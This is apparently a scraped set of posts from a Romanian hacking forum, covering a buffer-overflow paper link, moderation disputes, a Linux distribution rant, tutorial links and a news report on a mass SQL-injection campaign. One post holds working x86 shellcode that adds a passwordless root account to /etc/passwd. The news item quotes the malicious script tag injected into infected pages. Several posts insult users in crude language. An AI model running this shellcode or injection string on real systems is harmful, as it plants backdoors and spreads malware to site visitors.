Nytro

Buffer Overflows: Anatomy of an Exploit A Look at How Systems are Exploited, and Why These Exploits Exist Joshua Hulse n3v3rm0r3.nevermore at gmail.com January 10, 2012 This paper will look at how buffer overflows occur on the stack. It will outline how the stack should be visualised when software engineers code in languages that requires manual memory management(assembly, c, c++, etc) and the importance of the ‘null terminating character’ in possible vulnerabilities. Before considering the exploitation of systems and the methods that should be employed to remove them, some time will be spent explaining the stack in the x86 architecture, the flat memory model employed by modern operating systems how payloads are written and delivered to exploited programs. Download: http://www.exploit-db.com/download_pdf/18346

Par sa mearga acum. Sa vedem ce putem face cu celelalte imagini, semnaturi sau postate.

De azi s-a pus si SSL (HTTPS) pe RST. Cred ca era necesar. Un anunt bun pentru cei mai paranoici dintre noi. Multumiri tex.

:">

dfsdfds :->

:-X

adwasd dsfsf

Si ce vrei sa demonstrezi cu asta periculosule? Ai iesit si tu din grota si ai pus mana pe un calculator si s-au umflat muschii pe tine. Pacat, nu ar trebui sa va cumpere parintii calculator, nu intelegeti la ce se foloseste.

Amuzantule. Nici nu ma stresez sa iti dau ban, nu meriti nici atat. Culca-te.

Cacat.

Citeste: Portable Executable - Wikipedia, the free encyclopedia Peering Inside the PE: A Tour of the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2 Microsoft PE and COFF Specification Iczelion's Win32 Assembly Homepage http://www.drpaulcarter.com/pcasm/pcasm-book-pdf.zip OllyDbg Tutorials / Downloads - Tuts 4 You TiGa's Video Tutorial Site Lenas Reversing for Newbies / Downloads - Tuts 4 You Citeste cam in ordinea in care le-am postat. DUPA CE CITESTI revii cu intrebari, dar garantez ca nu o sa mai ai intrebari.

Faceti un rezumat si spuneti-mi cui sa dau ban.

Avem o categorie pentru asta, ii spune "Cosul de gunoi".

E o versiune ceva mai noua parca cu o alta prezentare.

Cateva imagini si videoclipuri: Invizibilitatea – cândva fic?iune, în curând realitate

Nu e vorba ca e prea usor de folosit, dar ascunde si pune sub GUI tot ce inseamna Linux, in special linia de comanda si multe alte lucrurii. Cu alte cuvinte, nu o sa intelegi niciodata lucruri care tin strict de Linux cum am enumerat mai sus, pentru ca dai 2 click-uri si ai rezolvat tot. Eu cu Slackware am invatat multe despre Linux. Am citit Slackware Essentials, am luat la rand executabilele din /bin, /sbin, /usr/bin si /usr/sbin si le-am --help-uit. Am modificat cam tot ce se putea modifica, de la Grub, fstab la scripturile de initializare ale serverului X, am schimbat intre KDE si Gnome, am compilat zeci de surse (4 ore compilat Qt), instalam LAMP din surse, mi-am compilat de x ori kernelul pentru ca scoteam lucruri esentiale in ideea ca il fac mai rapid, partitionari din linia de comanda, diverse teste cu /dev-urile, ma mai uitam prin sursa kernel-ului in speranta ca invat cate ceva si milioane de multe alte lucruri. Cu Ubuntu e altfel. Instalezi cu Next, Next, Finish, intri in Synaptic Package Manager, selectezi x pachete, click pe Install, apoi le executi din meniul Application si ai GUI pentru orice, ceea ce inseamna ca nu mai stii ce e "sub" acel GUI si ce se intampla in spate, ca nu mai stii ce e ala Linux in adevaratul sens al cuvantului si ca daca iti pune unu o linie de comanda in fata o sa ramai cautand acel meniu "Application". Altfel spus, nu ai nevoie sa te chinui o jumatate de ora sa instalezi Flash Plugin pentru Firefox, pentru ca o faci din 2 click-uri, dar nu stii ce fac acele clik-uri de exemplu. Raman la ideea ca Ubuntu NU e Linux. Da, nici mie nu imi mergea Wireless-ul pe Slackware, nici conexiunea PPPoE si asta m-a fortat sa ma informez si sa invat multe lucruri si ca de fapt nu e asa complicat sa descarci sursa de la rp-pppoe si pppoe-start, sau ca nu e greu sa gasesti driverul Realtek corespunzator placii mele wireless, sa il compilez si sa incarc modulul pentru a putea folosi aircrack. Ce-i drept, Slackware necesita mult timp sa il configurezi cum vrei tu, sa instalezi ce vrei tu, sa modifici scripturile de initializare sa iti porneasca in 10 secunde si sa se opreasca in 5 secunde, dar se merita si inveti mai multe decat ti-ai fi imaginat vreodata ca vei invata.

Ai RPM pentru Slackware. De asemenea au pachete tgz si un package manager din linia de comanda. Si oricum ar fi, daca ai Slackware, esti in stare sa iti instalezi orice rahat compiland sursa sau sa iti compilezi tu un kernel. Si Slackware ESTE Linux, Ubuntu este o pula in cur pentru ratatii care vor sa se laude ca au si ei Linux si nu stiu ce e ala swap, cum se incarca un modul de kernel, sa scrie o expresie regulata pentru grep, cu ce se mananca iptables, sa compileze un pachet din sursa, sau sa compileze un kernel. Daca vrei Linux, alegi Ubuntu. Daca vrei un cacat, dar sa te lauzi ca ai Linux, alegi Ubuntu.

Tutoriale de programare Tutorial C Pentru cei care vor sa invete bazele programarii, sa inteleaga programarea, si sa devina buni programatori le recomandam sa inceapa studierea limbajului C, inainte de C++. Multe persoane incep sa invete direct Programare Orientata pe Obiecte (POO) in C++, lasand C-ul la o parte si ajung sa isi dea seama ca programarea nu-i de ei si se lasa, neincercand sa invete C, care ii va ajuta sa inteleaga si C++. Tutorial POO/C++ Pentru acei ce stapanesc limbajul C, este timpul sa treaca la Programare Orientata pe obiecte (POO) in C++ si C#. Tutorial C# C# este un limbaj de programare orientat-obiect conceput de Microsoft la sf??r??itul anilor 90. A fost conceput ca un concurent pentru limbajul Java. Ca ??i acesta, C# este un derivat al limbajului de programare C++. Tutorial complet HTML Hyper Text Markup Language se adreseaza celor care doresc sa realizeze pagini web. Acest limbaj de marcare sta la baza programarii WEB, fiecare website folosind HTML in constructia sa. Link: http://www.tutorialeprogramare.ro/

User "rst" fara parola: "\xb0\x17\x31\xdb\xcd\x80\xb0\x2e\x53\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x6f\x74\x3a\x2f\x68\x3a\x2f\x72\x6f\x68\x3a\x52\x53\x54\x68\x3a\x30\x3a\x30\x68\x72\x73\x74\x3a\x89\xe1\x6a\x1c\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80"

20 de cutremure au avut loc în Câmpia Român?, în ultimele ore

SticKyWoX - Sa privim si din alt unghi situatia. Ai creat 38 de topicuri dintre care: - 15 la Offtopic - 16 la Ajutor Adica 31. Si mai raman cateva, care sunt de asemenea inutile. Ceea ce vreau sa subliniez e faptul ca nu ai contribuit cu nimic la forum, cu alte cuvinte prefer sa iti dau tie ban decat unuia care face 2-3 greseli gramaticale dar care contribuie la forum. Intelegeti cum gandesc?

Bun. Banuiesc ca nu o sa se opuna nimeni. O sa fac putin ordine diseara, daca nu uit.

Aratati-mi posturi cu multe greseli gramaticale. Acum daca posteza cineva un "decat" in loc de "doar", sa ii dam avertisment? Daca uita o cratima sau nu lasa spatii dupa semnele de punctuatie sa ii dam ban? Daca nu termina propozitia cu punct, inseamna ca e analfabet si il ardem pe rug? Si daca e sa ma gandesc la "neox" care nu e roman, deci gramatica sa nu e tocmai perfecta, dar va pune in cur pe 90+% dintre voi la cunostinte tehnice, lui sa ii dau ban, sau celor care o ard aiurea pe aici ca sa se afle si ei in treaba, dar vai, scriu corect gramatical? Nu toleram posturile de cocalari ce contin "k" in loc de "ca", "sh" in loc de "?"... Dar RST nu este ESL Forums, Teach English, Learn ESL online ca sa ne facem griji pentru mici greseli gramaticale. Cat timp posturile sunt utile, nu se leaga nimeni de micile greseli gramaticale si nici nu are rost sa punem accent pe ele. De asemenea sa nu va prind cu posturi ca "Ai uitat sa pui virgula" sau sa corectati un cuvant scris gresit intr-un post anterior ca primiti voi avertisment, pentru ca aceste posturi sunt inutile si vor incepe dispute pe tema "tu esti mai analfabet decat mine". Daca chiar doriti sa ajutati persoana respectiva ii dati un PM, insa poate acea greseala nu e cu intentie si doar graba e de vina. Intre timp, ganditi-va ca nici voi nu folositi diacritice, adica tot incorect ortografic scrieti, asa ca nu mai fiti zmeii gramaticii. Nici eu nu scriu cu diacritice si mai fac greseli gramaticale, dar fac asta pentru ca ma grabsesc, pentru ca nu stau 10 ani sa formulez o fraza si scriu ce imi trece in clipa de fata prin cap, pentru ca nu sunt romancier si cunostintele mele de gramatica sunt doar acceptabile, nu perfecte. Iar in situatia mea sunteti cam toti. Pe scurt, vreau sa vad posturi cu greseli gramaticale (link-uri), iar ideea cu contorul sa le-o prezentati celor de la EnglishForums de exemplu, locuri unde se pune accent pe aceste lucruri, in caz ca nu v-ati dat seama, RST e pentru altceva.

http://rstcenter.com/forum/search.php?do=finduser&userid=16882&contenttype=vBForum_Post&showposts=1 Ban.

One million pages infected by Lilupophilupop SQL injection One million pages infected by Lilupophilupop SQL injection ISC (Internet Storm Center) reported that lilupophilupop.com SQL injection attacks. There were about 80 pages infected according to Google searches few weeks back and now it raise to over 1 million . sites being injected with string : "></title><script src="http://lilupophilupop.com/sl.php"></script> Infections are shows on .com, .de, & .uk as the most affected regions. ISC posted stats just to give you a rough idea of where the pages are: UK - 56,300 NL - 123,000 DE - 49,700 FR - 68,100 DK - 31,000 CN - 505 CA - 16,600 COM - 30,500 RU - 32,000 JP - 23,200 ORG - 2,690 If you want to find out if you have a problem just search for "<script src="http://lilupophilupop.com/" in google and use the site: parameter to hone in on your domain. [News Submitted by @om_bee] Sursa: One million pages infected by Lilupophilupop SQL injection | The Hacker News (THN)